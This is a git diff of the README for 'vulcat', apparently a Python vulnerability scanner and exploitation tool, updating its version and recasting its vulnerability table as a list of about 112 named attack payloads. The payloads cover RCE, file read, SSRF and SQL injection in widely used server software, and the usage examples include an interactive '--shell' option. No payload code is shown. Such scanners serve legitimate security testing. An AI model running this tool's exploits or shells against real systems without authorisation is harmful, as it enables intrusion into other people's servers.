++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| fastjson-cnvd-2017-02833-rce | Y | Fastjson <= 1.2.24 deSerialization |
+| fastjson-cnvd-2019-22238-rce | Y | Fastjson <= 1.2.47 deSerialization |
+| fastjson-v1.2.62-rce | Y | Fastjson <= 1.2.62 deSerialization |
+| fastjson-v1.2.66-rce | Y | Fastjson <= 1.2.66 deSerialization |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| gitea-unauth-fileread-rce | - | Gitea 1.4.0 unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| gitlab-cve-2021-22205-rce.py | - | GitLab Pre-Auth Remote code execution |
+| gitlab-cve-2021-22214-ssrf | Y | Gitlab CI Lint API SSRF |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| gocd-cve-2021-43287-fileread | Y | GoCD Business Continuity FileRead |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| grafana-cve-2021-43798-fileread | Y | Grafana 8.x Directory traversal |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| influxdb-unauth | - | influxdb unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jboss-unauth | - | JBoss unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jenkins-cve-2018-1000861-rce | Y | jenkins Remote code execution |
+| jenkins-unauth | Y | Jenkins unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jetty-cve-2021-28164-dsinfo | - | jetty Disclosure information |
+| jetty-cve-2021-28169-dsinfo | - | jetty Servlets ConcatServlet Disclosure information |
+| jetty-cve-2021-34429-dsinfo | - | jetty Disclosure information |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| joomla-cve-2017-8917-sqlinject | - | Joomla3.7 Core com_fields SQLinject |
+| joomla-cve-2023-23752-unauth | - | Joomla unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jupyter-unauth | - | Jupyter unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| keycloak-cve-2020-10770-ssrf | - | request_uri SSRF |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| landray-oa-cnvd-2021-28277-ssrf-fileread | Y | Landray-OA FileRead/SSRF |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| minihttpd-cve-2018-18778-fileread | - | mini_httpd FileRead |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| mongoexpress-cve-2019-10758-rce | Y | Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| nexus-cve-2019-5475-rce | Y | 2.x yum Remote code execution |
+| nexus-cve-2019-7238-rce | Y | 3.x Remote code execution |
+| nexus-cve-2019-15588-rce | Y | 2019-5475 Bypass |
+| nexus-cve-2020-10199-rce | Y | 3.x Remote code execution |
+| nexus-cve-2020-10204-rce | Y | 3.x Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| nodejs-cve-2017-14849-fileread | Y | Node.js Directory traversal |
+| nodejs-cve-2021-21315-rce | Y | Node.js Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| nodered-cve-2021-3223-fileread | Y | Node-RED Directory traversal |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| phpmyadmin-cve-2018-12613-fileinclude-fileread | - | phpMyadmin Scripts/setup.php Deserialization |
+| phpmyadmin-wooyun-2016-199433-unserialize | Y | phpMyadmin 4.8.1 Remote File Inclusion |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| phpunit-cve-2017-9841-rce | Y | PHPUnit Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| ruby-on-rails-cve-2018-3760-fileread | Y | Ruby on Rails Directory traversal |
+| ruby-on-rails-cve-2019-5418-fileread | Y | Ruby on Rails FileRead |
+| ruby-on-rails-cve-2020-8163-rce | - | Ruby on Rails Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| showdoc-cnvd-2020-26585-fileupload | - | ShowDoc writes to any file |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| spring-security-oauth-cve-2016-4977-rce | - | Spring Security OAuth2 Remote Command Execution |
+| spring-data-rest-cve-2017-8046-rce | - | Spring Data Rest Remote Command Execution |
+| spring-data-commons-cve-2018-1273-rce | Y | Spring Data Commons Remote Command Execution |
+| spring-cloud-config-cve-2020-5410-fileread | Y | Spring Cloud Directory traversal |
+| spring-boot-cve-2021-21234-fileread | Y | Spring Boot Directory traversal |
+| spring-cloud-gateway-cve-2022-22947-rce | - | Spring Cloud Gateway SpEl Remote code execution |
+| spring-cloud-function-cve-2022-22963-rce | Y | Spring Cloud Function SpEL Remote code execution |
+| spring-cve-2022-22965-rce | - | Spring Framework Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| supervisor-cve-2017-11610-rce | - | Supervisor Remote Command Execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| thinkphp-cve-2018-1002015-rce | Y | ThinkPHP5.x Remote code execution |
+| thinkphp-cnvd-2018-24942-rce | Y | The forced route is not enabled RCE |
+| thinkphp-cnnvd-201901-445-rce | Y | Core class Request Remote code execution |
+| thinkphp-cnvd-2022-86535-rce | - | ThinkPHP "think-lang" Remote code execution |
+| thinkphp-2.x-rce | - | ThinkPHP2.x Remote code execution |
+| thinkphp-5-ids-sqlinject | - | ThinkPHP5 ids SQLinject |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| ueditor-ssrf | - | Ueditor SSRF |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| uwsgiphp-cve-2018-7490-fileread | Y | uWSGI-PHP Directory traversal |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| vmware-vcenter-2020-10-fileread | Y | In 2020 VMware vCenter 6.5 Any file read |
+| vmware-vcenter-cve-2021-21972-fileupload-rce | - | VMware vSphere Client RCE |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| oracle-weblogic-cve-2014-4210-ssrf | - | Weblogic SSRF |
+| oracle-weblogic-cve-2017-10271-unserialize | - | Weblogic XMLDecoder deSerialization |
+| oracle-weblogic-cve-2019-2725-unserialize | - | Weblogic wls9_async deSerialization |
+| oracle-weblogic-cve-2020-14750-bypass | - | Weblogic Authentication bypass |
+| oracle-weblogic-cve-2020-14882-rce-unauth | Y | Weblogic Unauthorized command execution |
+| oracle-weblogic-cve-2021-2109-rce | - | Weblogic LDAP Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| webmin-cve-2019-15107-rce | Y | Webmin Pre-Auth Remote code execution |
+| webmin-cve-2019-15642-rce | Y | Webmin Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| yonyou-grp-u8-cnnvd-201610-923-sqlinject | - | Yonyou-GRP-U8 Proxy SQLinject |
+| yonyou-nc-cnvd-2021-30167-rce | Y | Yonyou-NC BeanShell Remote code execution |
+| yonyou-erp-nc-ncfindweb-fileread | - | Yonyou-ERP-NC NCFindWeb Directory traversal |
+| yonyou-u8-oa-getsession-dsinfo | - | Yonyou-U8-OA getSessionList.jsp Disclosure info |
+| yonyou-u8-oa-test.jsp-sqlinject | - | Yonyou-U8-OA test.jsp SQLinject |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| zabbix-cve-2016-10134-sqlinject | - | latest.php or jsrpc.php SQLinject |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+vulcat-2.0.0/2023.03.15
+112/Poc
+55/Shell
```
@@ -371,6 +364,7 @@ vulcat-1.2.0/2023.03.01
* [vulhub](https://github.com/vulhub/vulhub)
* [vulfocus](https://github.com/fofapro/vulfocus)
* [ttkbootstrap](https://github.com/israel-dryer/ttkbootstrap/)
+* [Xray](github.com/chaitin/xray)
## Document
diff --git a/README.md b/README.md
index 794d47a..a159b43 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
# vulcat
[![python](https://img.shields.io/badge/Python-3-blue?logo=python)](https://shields.io/)
-[![version](https://img.shields.io/badge/Version-1.2.0-blue)](https://shields.io/)
+[![version](https://img.shields.io/badge/Version-2.0.0-blue)](https://shields.io/)
[![license](https://img.shields.io/badge/LICENSE-GPL-yellow)](https://shields.io/)
[![stars](https://img.shields.io/github/stars/CLincat/vulcat?color=red)](https://shields.io/)
[![forks](https://img.shields.io/github/forks/CLincat/vulcat?color=red)](https://shields.io/)
@@ -49,182 +49,188 @@ Usage: python3 vulcat.py
Examples:
python3 vulcat.py -h
python3 vulcat.py --list
-python3 vulcat.py -u https://www.example.com/ -o html
-python3 vulcat.py -u https://www.example.com/ -a httpd --log 3
-python3 vulcat.py -u https://www.example.com/ -a thinkphp -v cnvd-2018-24942
-python3 vulcat.py -f url.txt --delay 0.5
+python3 vulcat.py -u https://www.example.com/
+python3 vulcat.py -f url.txt -o html
+python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
```
-## 漏洞列表
+## 攻击载荷列表
-目前支持检测的漏洞: [点击展开]
+以下是vulcat拥有的攻击载荷: [点击展开]
```
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Target | Vuln id | Vuln Type | Sh | Description |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Alibaba Druid | (None) | unAuth | - | 阿里巴巴Druid未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | - | 阿里巴巴Nacos未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | - | Airflow身份验证绕过 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX默认密钥 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Druid | CVE-2021-25646 | RCE | Y | Apache Druid 远程代码执行 |
-| Apache Druid | CVE-2021-36749 | FileRead | Y | Apache Druid 任意文件读取 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | Y | Flink目录遍历 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Hadoop | (None) | unAuth | - | Hadoop YARN ResourceManager 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF |
-| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 路径遍历 |
-| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 路径遍历 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQL注入 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Solr | CVE-2017-12629 | RCE | - | Solr 远程命令执行 |
-| Apache Solr | CVE-2019-17558 | RCE | Y | Solr Velocity 注入远程命令执行 |
-| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/任意文件读取 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | - | PUT方法任意文件写入 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Unomi | CVE-2020-13942 | RCE | Y | Apache Unomi远程表达式代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb身份认证绕过 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence任意文件包含 |
-| Atlassian Confluence | CVE-2019-3396 | FileRead | Y | Confluence路径遍历和命令执行 |
-| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
-| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | - | 思科ASA/FTD XSS跨站脚本攻击 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | Y | 全局变量防御绕过RCE |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | - | debug page XSS跨站脚本攻击 |
-| Django | CVE-2018-14574 | Redirect | - | CommonMiddleware url重定向 |
-| Django | CVE-2019-14234 | SQLinject | - | JSONfield SQL注入 |
-| Django | CVE-2020-9402 | SQLinject | - | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | - | QuerySet.order_by SQL注入 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQL 注入 |
-| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML 反序列化代码执行 |
-| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 远程代码执行 |
-| Drupal | CVE-2018-7602 | RCE | - | Drupal 远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch命令执行 |
-| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy 沙盒绕过&&代码执行 |
-| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch 目录穿越 |
-| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch 目录穿越 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP远程代码执行 |
-| F5 BIG-IP | CVE-2022-1388 | unAuth/RCE | Y | BIG-IP远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | Y | Fastjson <= 1.2.24 反序列化 |
-| Fastjson | CNVD-2019-22238 | unSerialize | Y | Fastjson <= 1.2.47 反序列化 |
-| Fastjson | rce-1-2-62 | unSerialize | Y | Fastjson <= 1.2.62 反序列化 |
-| Fastjson | rce-1-2-66 | unSerialize | Y | Fastjson <= 1.2.66 反序列化 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Gitea | (None) | unAuth | - | Gitea 1.4.0 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth 远程命令执行 |
-| Gitlab | CVE-2021-22214 | SSRF | Y | Gitlab CI Lint API未授权 SSRF |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| GoCD | CVE-2021-43287 | FileRead | Y | GoCD Business Continuity 任意文件读取 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x 插件模块路径遍历 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Influxdb | (None) | unAuth | - | influxdb 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| JBoss | (None) | unAuth | - | JBoss 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | Y | jenkins 远程命令执行 |
-| Jenkins | (None) | unAuth | Y | Jenkins 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Jetty | CVE-2021-28164 | DSinfo | - | jetty 模糊路径信息泄露 |
-| Jetty | CVE-2021-28169 | DSinfo | - | jetty Utility Servlets ConcatServlet 双重解码信息泄露 |
-| Jetty | CVE-2021-34429 | DSinfo | - | jetty 模糊路径信息泄露 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Joomla | CVE-2017-8917 | SQLinject | - | Joomla3.7 Core com_fields组件SQL注入 |
-| Joomla | CVE-2023-23752 | unAuth | - | Joomla 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Jupyter | (None) | unAuth | - | Jupyter 未授权访问 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | - | 使用request_uri调用未经验证的URL |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | 蓝凌OA 任意文件读取/SSRF |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd 任意文件读取 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | Y | 未授权远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum插件 远程命令执行 |
-| Nexus Repository | CVE-2019-7238 | RCE | Y | 3.x 远程命令执行 |
-| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475的绕过 |
-| Nexus Repository | CVE-2020-10199 | RCE | Y | 3.x 远程命令执行 |
-| Nexus Repository | CVE-2020-10204 | RCE | Y | 3.x 远程命令执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js目录穿越 |
-| Nodejs | CVE-2021-21315 | RCE | Y | Node.js命令执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED 任意文件读取 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php 反序列化 |
-| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 远程文件包含 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit 远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails 路径遍历 |
-| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails 任意文件读取 |
-| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails 命令执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc 任意文件上传 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 远程命令执行 |
-| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest 远程命令执行 |
-| Spring | CVE-2018-1273 | RCE | Y | Spring Data Commons 远程命令执行 |
-| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud目录遍历 |
-| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot目录遍历 |
-| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl远程代码执行 |
-| Spring | CVE-2022-22963 | RCE | Y | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22965 | RCE | - | Spring Framework远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Supervisor | CVE-2017-11610 | RCE | - | Supervisor 远程命令执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x 远程代码执行 |
-| ThinkPHP | CNVD-2018-24942 | RCE | Y | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | Y | 核心类Request远程代码执行 |
-| ThinkPHP | CNVD-2022-86535 | RCE | - | ThinkPHP 多语言模块命令执行 |
-| ThinkPHP | rce-2-x | RCE | - | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | ids-sqlinject-5 | SQLinject | - | ThinkPHP5 ids参数SQL注入 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Ueditor | (None) | SSRF | - | Ueditor编辑器SSRF |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| uWSGI-PHP | CVE-2018-7490 | FileRead | Y | uWSGI-PHP目录穿越 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic 服务端请求伪造 |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder反序列化 |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async反序列化 |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic 权限验证绕过 |
-| Oracle Weblogic | CVE-2020-14882 | RCE | Y | Weblogic 未授权命令执行 |
-| Oracle Weblogic | CVE-2021-2109 | RCE | - | Weblogic LDAP 远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth 远程代码执行 |
-| Webmin | CVE-2019-15642 | RCE | Y | Webmin 远程代码执行 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Yonyou | CNNVD-201610-923 | SQLinject | - | 用友GRP-U8 Proxy SQL注入 |
-| Yonyou | CNVD-2021-30167 | RCE | Y | 用友NC BeanShell远程命令执行 |
-| Yonyou | nc-fileread | FileRead | - | 用友ERP-NC NCFindWeb目录遍历 |
-| Yonyou | u8-oa-getsession | DSinfo | - | 用友U8 OA getSessionList.jsp 敏感信息泄漏 |
-| Yonyou | u8-oa-test-sql | SQLinject | - | 用友U8 OA test.jsp SQL注入 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Zabbix | CVE-2016-10134 | SQLinject | - | latest.php或jsrpc.php存在sql注入 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-vulcat-1.2.0/2023.03.01
-108/Poc
-54/Shell
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| Payloads | Sh | Description |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| 74cms-v5.0.1-sqlinject | - | 74cms v5.0.1 前台AjaxPersonalController.class.php存在SQL注入 |
+| 74cms-v6.0.4-xss | - | 74cms v6.0.4 帮助中心搜索框XSS |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| alibaba-druid-unauth | - | 阿里巴巴Druid未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| alibaba-nacos-cve-2021-29441-unauth | - | 阿里巴巴Nacos未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-airflow-cve-2020-17526-unauth | - | Airflow身份验证绕过 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-apisix-cve-2020-13945-unauth | - | Apache APISIX默认密钥 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-druid-cve-2021-25646-rce | Y | Apache Druid 远程代码执行 |
+| apache-druid-cve-2021-36749-fileread | Y | Apache Druid 任意文件读取 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-flink-cve-2020-17519-fileread | Y | Flink目录遍历 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-hadoop-unauth | - | Hadoop YARN ResourceManager 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-httpd-cve-2021-40438-ssrf | - | Apache HTTP Server 2.4.48 mod_proxy SSRF |
+| apache-httpd-cve-2021-41773-rce-fileread | Y | Apache HTTP Server 2.4.49 路径遍历 |
+| apache-httpd-cve-2021-42013-rce-fileread | Y | Apache HTTP Server 2.4.50 路径遍历 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-skywalking-cve-2020-9483-sqlinject | - | SkyWalking SQL注入 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-solr-cve-2017-12629-rce | - | Solr 远程命令执行 |
+| apache-solr-cve-2019-17558-rce | Y | Solr Velocity 注入远程命令执行 |
+| apache-solr-cve-2021-27905-ssrf-fileread | Y | Solr SSRF/任意文件读取 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-tomcat-cve-2017-12615-fileupload | - | PUT方法任意文件写入 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-unomi-cve-2020-13942-rce | Y | Apache Unomi远程表达式代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| appweb-cve-2018-8715-unauth | - | AppWeb身份认证绕过 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| atlassian-confluence-cve-2015-8399-fileread-fileinclude | Y | Confluence任意文件包含 |
+| atlassian-confluence-cve-2019-3396-fileread | Y | Confluence路径遍历和命令执行 |
+| atlassian-confluence-cve-2021-26084-rce | Y | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| atlassian-confluence-cve-2022-26134-rce | Y | Confluence远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| cisco-cve-2020-3580-xss | - | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| discuz-wooyun-2010-080723-rce | Y | 全局变量防御绕过RCE |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| django-cve-2017-12794-xss | - | debug page XSS跨站脚本攻击 |
+| django-cve-2018-14574-redirect | - | CommonMiddleware url重定向 |
+| django-cve-2019-14234-sqlinject | - | JSONfield SQL注入 |
+| django-cve-2020-9402-sqlinject | - | GIS SQL注入 |
+| django-cve-2021-35042-sqlinject | - | QuerySet.order_by SQL注入 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| drupal-cve-2014-3704-sqlinject | - | Drupal < 7.32 Drupalgeddon SQL 注入 |
+| drupal-cve-2017-6920-rce | - | Drupal Core 8 PECL YAML 反序列化代码执行 |
+| drupal-cve-2018-7600-rce | Y | Drupal Drupalgeddon 2 远程代码执行 |
+| drupal-cve-2018-7602-rce | - | Drupal 远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| elasticsearch-cve-2014-3120-rce | Y | ElasticSearch命令执行 |
+| elasticsearch-cve-2015-1427-rce | Y | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| elasticsearch-cve-2015-3337-fileread | Y | ElasticSearch 目录穿越 |
+| elasticsearch-cve-2015-5531-fileread | Y | ElasticSearch 目录穿越 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| f5bigip-cve-2020-5902-rce-fileread | - | BIG-IP远程代码执行 |
+| f5bigip-cve-2022-1388-unauth-rce | Y | BIG-IP身份认证绕过RCE |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| fastjson-cnvd-2017-02833-rce | Y | Fastjson <= 1.2.24 反序列化 |
+| fastjson-cnvd-2019-22238-rce | Y | Fastjson <= 1.2.47 反序列化 |
+| fastjson-v1.2.62-rce | Y | Fastjson <= 1.2.62 反序列化 |
+| fastjson-v1.2.66-rce | Y | Fastjson <= 1.2.66 反序列化 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| gitea-unauth-fileread-rce | - | Gitea 1.4.0 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| gitlab-cve-2021-22205-rce.py | - | GitLab Pre-Auth 远程命令执行 |
+| gitlab-cve-2021-22214-ssrf | Y | Gitlab CI Lint API未授权 SSRF |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| gocd-cve-2021-43287-fileread | Y | GoCD Business Continuity 任意文件读取 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| grafana-cve-2021-43798-fileread | Y | Grafana 8.x 插件模块路径遍历 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| influxdb-unauth | - | influxdb 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jboss-unauth | - | JBoss 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jenkins-cve-2018-1000861-rce | Y | jenkins 远程命令执行 |
+| jenkins-unauth | Y | Jenkins 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jetty-cve-2021-28164-dsinfo | - | jetty 模糊路径信息泄露 |
+| jetty-cve-2021-28169-dsinfo | - | jetty Utility Servlets ConcatServlet 双重解码信息泄露 |
+| jetty-cve-2021-34429-dsinfo | - | jetty 模糊路径信息泄露 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| joomla-cve-2017-8917-sqlinject | - | Joomla3.7 Core com_fields组件SQL注入 |
+| joomla-cve-2023-23752-unauth | - | Joomla 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jupyter-unauth | - | Jupyter 未授权访问 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| keycloak-cve-2020-10770-ssrf | - | 使用request_uri调用未经验证的URL |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| landray-oa-cnvd-2021-28277-ssrf-fileread | Y | 蓝凌OA 任意文件读取/SSRF |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| minihttpd-cve-2018-18778-fileread | - | mini_httpd 任意文件读取 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| mongoexpress-cve-2019-10758-rce | Y | 未授权远程代码执行 |
